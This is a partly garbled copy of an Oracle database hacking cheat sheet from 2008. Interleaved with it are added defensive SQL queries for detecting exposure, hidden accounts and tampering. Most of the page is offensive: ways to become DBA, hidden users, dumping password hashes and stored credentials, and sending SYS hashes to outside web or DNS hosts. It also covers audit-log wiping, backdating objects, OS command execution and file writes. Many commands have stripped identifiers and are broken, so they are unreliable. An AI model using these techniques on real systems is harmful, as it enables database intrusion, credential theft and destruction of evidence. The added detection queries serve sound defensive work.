Oracle Security Cheat Sheet - Red-Database-Security


Hacking Oracle - Version - 29-Jan-2008

Ways to become DBA (flattened from the attack-tree chart of the original; version columns of the chart: R1 / 9i R2 / 10g R1 / 10g R2 / 11g R1)

XMLDB installed and active (: dispatchers='(PROTOCOL=TCP) (SERVICE=<ORACLE_SID>XDB)'), Port 2100 (FTP), Port 8080 (HTTP)
- Buffer overflow via long FTP or HTTP password (published, Metasploit exploit)
- Buffer overflow via long FTP username (unpublished, no published exploit available)
- SQL injection via xmldb & transform (use a low-privileged user to get DBA privileges), until 
ONS installed (onsctl start, Port 6200, <= )
- Amap against port 6200 crashes the ONS service
TNS-Listener without password / ADMIN_RESTRICTION
R*services installed (create file .rhosts unix/mac: : )
No R*services installed (create file unix/mac: : )
Modify / $ account (create a user with the name of OPS$ and login without pw)
Simple file sharing (connect to a DB running on Windows XP with Simple File Sharing)
Insert code like grant dba to user
Oracle rdspw /add
Sqlplus /@ip/sid as sysdba
OCI-Connection (TNS Listener available (default 1521))
SID unknown:
- Oracle 7-9i R2 (lsnrctl status ip) 9.2.0.6/7 + Listener Password, or Oracle 10g R1/R2 (use sidguess to bruteforce SID)
- XMLDB
SID known
Oracle account unknown:
- Brute-force accounts (with hydra against FTP (2100), dbsnmp, outln, sys, system)
- Brute-force accounts (with hydra against HTTP (8080), dbsnmp, outln, sys, system)
- Default accounts (dbsnmp/dbsnmp, outln/outln, sys/change_on_install, system/manager)
Oracle account known
Escalate privileges if not DBA (with CPU Jan 2006): Patch and login or R1
- Use SQL injection in Oracle packages, $MCP: change public synonym dbms_assert and inject sql code
- SQL injection DBMS_EXPORT_EXTENSION (fixed with CPU July 2006)
- Update selectable tables via specially crafted inline views (fixed with CPU October 2006)
- Update selectable tables via specially crafted views (fixed for 10g R2 with CPU July 2007)
- Oracle 10g R1/R2 (use Database/Grid/Auditvault Control /em/console)
- (via SQL injection in webapp) Oracle 9iR2 - 11g (select global_name from global_name)
- 10g, 11g: use utl_tcp to modify TNS-Listener settings (change via )
- 10g, 11g: dbms_scheduler & run sqlplus / as sysdba
- Privilege escalation in vulnerable 3rd-party / customer code
This is only a small subset of possibilities to become DBA.

SQL*Plus Commands (not always supported in other clients like TOAD, SQL*Navigator):
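As an added defensive check (not part of the cheat sheet), the queries below test the exposure conditions from the tree above from inside the database: whether XML DB's FTP/HTTP protocol server is listening, whether the default accounts named in the brute-force branches are still open, and (11g and later) whether any account still has its shipped default password. They assume a DBA connection on Oracle 10g/11g; dbms_xdb.getftpport/gethttpport and dba_users_with_defpwd are standard Oracle objects that were not named on the page.

```sql
-- Added exposure check; not part of the Red-Database-Security cheat sheet.
-- Assumes a DBA connection on Oracle 10g/11g.

-- 1. XML DB protocol server: FTP (default 2100) and HTTP (default 8080).
--    A port of 0 means that protocol is disabled. Both also need the
--    dispatcher entry quoted in the tree above to be reachable at all.
select dbms_xdb.getftpport()  as xdb_ftp_port,
       dbms_xdb.gethttpport() as xdb_http_port
from   dual;

select name, value
from   v$parameter
where  name = 'dispatchers';

-- 2. The accounts named in the brute-force branches: are they still OPEN,
--    and which profile (password policy, failed-login limit) applies?
select username, account_status, lock_date, profile
from   dba_users
where  username in ('DBSNMP', 'OUTLN', 'SYS', 'SYSTEM')
order  by username;

-- 3. 11g and later only: accounts still on the password they shipped with
--    (dbsnmp/dbsnmp, outln/outln, system/manager, ...).
select username
from   dba_users_with_defpwd
order  by username;
```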

Connect with easy connect: sqlplus  -- works only with Oracle 10g/11g
Execute a SQL script from a HTTP server (FTP is also possible): 
show parameter -- show all parameters of the database
show parameter audit -- show audit settings
set term off -- disable terminal output
set term on -- enable terminal output
set heading off -- disable headlines
set pagesize 0 -- disable pagesize
set timing on -- show execution time
set autocommit on -- commit everything after every command (!dangerous!)
host  /c 0wned > c:\ -- run OS commands from sqlplus (on the client); instead of host, the shortcuts ! (unix) or $ (Windows) are also possible
set serveroutput on -- enable output from dbms_output
spool c:\ -- create a logfile of the SQL*Plus session called  (disable: spool off)
desc utl_http -- show package specification of utl_http
desc all_users -- show view specification of all_users

Useful Tools / Links:
checkpwd: -- fastest multiplatform Oracle dictionary password
-- fastest Oracle Brute Force
-- get a list of application password + search for a specific string in the
-- analyse Oracle listener
~jwa/hacks/ Security /tnscmd/tnscmd -- control unprotected TNS Listener without Oracle Client
sidguess: fastest Oracle dictionary password cracker
Oracle Assessment Kit.

Useful tools, to exploit the alter session bug
Oracle Instant Client
Oracle SQL GUI Tool for Oracle in Java
Backtrack 2 Linux Live CD with many Oracle Security Tools

Create Oracle User:
With create user cmd: create user user1 identified by rds2008; grant dba to user1; -- Password sent in cleartext over the network
With create role cmd: create role user1 identified by rds2008; update $ set type#=1 where name='USER1'; -- Create a role and change the type. Not audited
With grant: grant dba to user1 identified by rds2008; -- Privilege granted, user will be created if not existing
With grant: grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4; -- Password sent in cleartext over the network
Invisible User: update $ set type#=2 where name='USER1'; -- Hide a user in the views dba_users/all_users, no view modification necessary

Different ways to change Oracle Passwords:
With SQL*Plus password cmd: password system; -- Password not sent in cleartext
With alter user cmd: alter user system identified by rds2008; -- Password sent in cleartext over the network
With alter user cmd: alter user system identified by values '737B466C2DF536B9'; -- Set a password hash directly
With grant: grant connect to system identified by rds2008; -- Password sent in cleartext over the network
With update: update $ set password = '737B466C2DF536B9' where name='SYSTEM'; -- Unsupported, not auditable, flush of the dictionary cache necessary (alter system flush shared_pool;)

Get Patch Level:
Get patchlevel via opatch: opatch lsinventory -- Get the patchlevel via opatch (on DB server, OS level)
Get patchlevel via SQL: select * from dba_registry_history; -- Get last CPU applied

Information Retrieval:
Get version: select * from v$version; -- all users
Get security patchlevel: select * from dba_registry_history; -- only DBA, 9i+, empty or non-existing table = no Security Patch installed
Get database components: select * from dba_registry; -- only DBA
Get userlist: select * from all_users; -- all users
Get user & PW hashes (7-10g): select username,password,account_status from dba_users; -- only DBA until 10g R2
Get user & PW hashes (11g/10g): select name,password,spare4,accountstatus from $, where user#=user_id; -- only DBA, 11g R1
Get Apex password hashes: select user_name, web_password_raw from ; -- only DBA, 030000 = APEX version , 020100 = 
Apex password hashes: select user_name, (' '||web_password_raw|| &b=MD5-Search ) from ; -- only DBA, requires internet access from the database
Get Metalink account/password: select (aru_username), (aru_password) from ; -- only DBA, 10g
Get password of mgmt_view_user: select view_username, (view_password) from ; -- only DBA, 10g
Get passwords of DB/Grid control: select credential_set_column, (credential_value) from ; -- only DBA, 10g
TDE encrypted tables: select table_name,column_name,encryption_alg,salt from dba_encrypted_columns; -- only DBA, 10g 11g
Show code using encryption: select owner, name, type, referenced_name from all_dependencies where referenced_name IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT'); -- show objects using database encryption (for passwords)

Already DBA? desc dba_users -- only possible if DBA (or select any dictionary), not audited
Get system privileges: select * from user_sys_privs; -- show system privileges of the current user
Get role privileges: select * from user_role_privs; -- show role privileges of the current user
Get table privileges: select * from user_tab_privs; -- show table privileges of the current user
Get interesting tables: select table_name,column_name,owner from dba_tab_columns where (upper(column_name) like '%PWD%' or upper(column_name) like '%PASSW%' or upper(column_name) like '%CREDEN%' or upper(column_name) like '%AUTH%'); -- show tables with columns containing the strings 'PWD', 'PASSW', 'CREDEN' or 'AUTH'
Get tables with : run the SQL script  -- the script is checking all objects
Get a list of all Oracle directories: select * from dba_directories; -- show Oracle directories
Access SQL history (v$sql): select sql_text from v$sql where lower(sql_text) like '%utl_http%'; -- search all SQL statements in the database containing the string utl_http
Access SQL history (wrh$_sqltext): select sql_text from wrh$_sqltext where lower(sql_text) like '%utl_http%'; -- search all SQL statements containing the string utl_http
Check, if audit_sys_operations: select name,value from v$parameter where name = 'audit_sys_operations'; -- check if commands submitted by SYS are audited
Check for database trigger: select owner,trigger_name from dba_triggers where trigger_type='AFTER EVENT'; -- check for logon, DDL or startup/shutdown trigger
Search strings in tables (dbgrep): run the SQL script (from RDS)
Get information from : run the SQL script (from RDS)

Web Access:
Web access via utl_http: select (' ) from dual; -- all users, 8-10g R2
Web access via httpuritype: select httpuritype(' ').
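As an added reconciliation check (not part of the cheat sheet), the queries below look for the account-manipulation variants listed under "Create Oracle User" above: entries hidden from dba_users/all_users, roles that carry a password, externally authenticated OPS$ accounts, and recently created accounts. They assume a DBA or SELECT ANY DICTIONARY connection; sys.user$ is the base table behind dba_users and dba_roles and was not named on the page.

```sql
-- Added reconciliation queries; not part of the Red-Database-Security
-- cheat sheet. Assumes DBA or SELECT ANY DICTIONARY. sys.user$ is the base
-- table behind dba_users (type# = 1) and dba_roles (type# = 0); assumption,
-- not from the page.

-- 1. Rows in the base table that neither view shows: this is what the
--    "invisible user" type# change above produces. PUBLIC and _NEXT_USER
--    are legitimate internal rows and are excluded; review anything else.
select u.name, u.type#, u.ctime as created
from   sys.user$ u
where  u.name not in (select username from dba_users)
  and  u.name not in (select role from dba_roles)
  and  u.name not in ('PUBLIC', '_NEXT_USER')
order  by u.ctime desc;

-- 2. Roles created with IDENTIFIED BY: a role with a password is one
--    type# update away from being a login, so each one should be justified.
select role, password_required
from   dba_roles
where  password_required = 'YES';

-- 3. Externally authenticated (OPS$-style) accounts: whoever controls the
--    matching OS account on a client can log in without a database password.
select username, created, account_status
from   dba_users
where  password = 'EXTERNAL'
   or  username like 'OPS$%'
order  by username;

-- 4. Accounts created in the last 30 days, to reconcile with change records
--    (grant ... identified by creates an account as a side effect).
select username, created, account_status, profile
from   dba_users
where  created > sysdate - 30
order  by created desc;
```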

.getclob() from dual; -- all users, 8-10g R2
Send password hash to webserver: select (' ||(select username|| = ||password from dba_users where username= SYS )) from dual; -- only DBA, change value of username for other users
Send password hash to webserver: select httpuritype(' ||(select username|| = ||password from dba_users where username= SYS )).getclob() from dual; -- only DBA, change value of username for other users
Send password hash via DNS: select ('http://www. ||(select username|| = ||password from dba_users where username= SYS )|| . ) from dual; -- only DBA, change value of username for other users

Anti-Forensics:
Clear v$sql: alter system flush shared_pool; -- only DBA, all versions
Clear : truncate table $_sqlstat; -- only DBA, 10g/11g
Clear audit table: truncate table $; -- only as SYS, all versions
Clear audit table: delete table $; -- only , all versions
Change object creation date: update $ set ctime=sysdate-300, mtime=sysdate-300, stime=sysdate-300 where name='AUD$'; -- change the creation date of an object

Run OS Commands via dbms_scheduler (10g/11g only):
-- Create a Program for dbms_scheduler
exec ('RDS2008','EXECUTABLE','c:\WINDOWS\system32\ /c echo 0wned >> c:\ ',0,TRUE)
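Added detection queries (not from the cheat sheet) for the web-access and anti-forensics entries above: statements in the cursor cache or AWR that open an outbound channel or touch the audit and SQL-history tables, the audit posture that decides whether a truncated AUD$ leaves any trace, and the object timestamps that the ctime/mtime/stime update rewrites. They assume a DBA connection; dba_hist_sqltext requires the Diagnostics Pack, and v$sql.sql_fulltext, dba_hist_sqltext and v$database are standard views not named on the page.

```sql
-- Added detection queries; not part of the Red-Database-Security cheat
-- sheet. Assumes a DBA connection; dba_hist_sqltext needs the Diagnostics Pack.

-- 1. Cached or AWR-recorded statements that reach out of the database
--    (utl_http, httpuritype, utl_inaddr for DNS, utl_tcp) or touch the
--    evidence tables (aud$, wrh$_sqlstat, flush shared_pool).
select s.parsing_schema_name, s.first_load_time, s.sql_id,
       dbms_lob.substr(s.sql_fulltext, 200, 1) as sql_text
from   v$sql s
where  regexp_like(s.sql_fulltext,
         'utl_http|httpuritype|utl_inaddr|utl_tcp|flush shared_pool|aud\$|wrh\$_sqlstat', 'i')
union all
select cast(null as varchar2(128)), cast(null as varchar2(19)), h.sql_id,
       dbms_lob.substr(h.sql_text, 200, 1)
from   dba_hist_sqltext h
where  regexp_like(h.sql_text,
         'utl_http|httpuritype|utl_inaddr|utl_tcp|flush shared_pool|aud\$|wrh\$_sqlstat', 'i');

-- 2. Audit posture: is SYS activity audited, and where does the trail go?
--    Only an OS or XML trail (audit_trail = OS / XML) survives a
--    "truncate table aud$" issued inside the database.
select name, value
from   v$parameter
where  name in ('audit_trail', 'audit_sys_operations', 'audit_file_dest');

-- 3. Timestamps of the audit tables. TRUNCATE is DDL and bumps
--    last_ddl_time; an object "created" before the database itself is the
--    backdating trick (update ... set ctime = sysdate-300) from above.
select o.object_name, o.created, o.last_ddl_time, d.created as db_created,
       case when o.created < d.created then 'BACKDATED' end as flag
from   dba_objects o, v$database d
where  o.owner = 'SYS'
  and  o.object_name in ('AUD$', 'FGA_LOG$');
```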

-- Create, execute and delete a Job for dbms_scheduler
exec (job_name => 'RDS2008 JOB', program_name => 'RDS2008', start_date => NULL, repeat_interval => NULL, end_date => NULL, enabled => TRUE, auto_drop => TRUE);
-- delete the program
exec (PROGRAM_NAME => 'RDS2008');
-- Purge the logfile for dbms_scheduler
--exec ;

Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\ ';
DECLARE
  fi ;
  bu RAW(32767);
BEGIN
  bu := hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F2C20576F726C64210D0A');
  fi := ('EXT', ' ', 'w', 32767);
  (fi, bu, TRUE);
  (fi);
END;
/

Write Text Files via dbms_advisor (10g/11g, requires the privilege advisor):
Create or replace directory EXT as 'C:\ ';
grant advisor to user1;
exec ( 'hacked', EXT, ' ' )

Write Text Files via utl_file:
Create or replace directory EXT as 'C:\ ';
DECLARE
  v_file ;
BEGIN
  v_file := ('C:\', ' ', 'w');
  (v_file, 'first row');
  (v_file);
  (v_file, 'second row');
  (v_file);
END;
/

Read Files via Java:
grant javasyspriv to user1;
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
import *;
import *;
public class JAVAREADFILE {
  public static void readfile(String filename) throws IOException {
    FileReader f = new FileReader(filename);
    BufferedReader fr = new BufferedReader(f);
    String text = ();
    while (text != null) {
      (text);
      text = ();
    }
    ();
  }
};
CREATE OR REPLACE
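Added privilege inventory (not part of the cheat sheet) for the OS-command, file-write and file-read routes above: execute grants on the packages involved, the roles and system privileges that give the same reach, directory objects with their READ/WRITE grantees, and Java file permissions. It assumes a DBA connection; dba_java_policy, dba_directories and the privilege names are standard Oracle objects not named on the page.

```sql
-- Added privilege inventory; not part of the Red-Database-Security cheat
-- sheet. Assumes a DBA connection.

-- 1. Who can execute the packages behind the OS-command and file routes
--    above. A grant to PUBLIC hands the route to every account.
select grantee, table_name as package_name, privilege
from   dba_tab_privs
where  owner = 'SYS'
  and  table_name in ('DBMS_SCHEDULER', 'UTL_FILE', 'DBMS_ADVISOR',
                      'DBMS_JAVA', 'UTL_HTTP', 'UTL_TCP', 'UTL_INADDR')
order  by table_name, grantee;

-- 2. Roles and system privileges that give the same reach: javasyspriv
--    (file access from Java), advisor (needed for the dbms_advisor route),
--    and the job/directory privileges dbms_scheduler and utl_file rely on.
select grantee, granted_role as privilege, cast('ROLE' as varchar2(16)) as kind
from   dba_role_privs
where  granted_role in ('JAVASYSPRIV', 'JAVA_ADMIN')
union all
select grantee, privilege, 'SYSTEM PRIVILEGE'
from   dba_sys_privs
where  privilege in ('ADVISOR', 'CREATE ANY DIRECTORY', 'CREATE ANY JOB',
                     'CREATE EXTERNAL JOB', 'CREATE JOB')
order  by 3, 2, 1;

-- 3. Directory objects, the OS path they expose, and who may read or write
--    through them (utl_file and dbms_advisor both need such a grant).
select d.directory_name, d.directory_path, p.grantee, p.privilege
from   dba_directories d
       left join dba_tab_privs p
              on p.owner = 'SYS' and p.table_name = d.directory_name
order  by d.directory_name, p.grantee, p.privilege;

-- 4. Java file permissions granted through dbms_java (column names of
--    dba_java_policy as documented by Oracle; assumed, not from the page).
select grantee, kind, name, action, enabled
from   dba_java_policy
where  type_name = 'java.io.FilePermission'
order  by grantee, name;
```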

